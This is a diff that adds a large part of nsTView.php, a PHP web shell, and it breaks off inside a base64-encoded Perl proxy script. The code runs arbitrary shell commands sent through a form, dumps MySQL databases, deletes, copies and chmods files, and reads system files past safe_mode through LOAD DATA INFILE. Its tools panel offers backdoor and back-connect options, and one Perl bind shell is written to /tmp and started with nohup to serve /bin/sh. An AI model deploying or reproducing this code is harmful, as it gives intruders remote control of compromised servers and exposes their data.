+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkg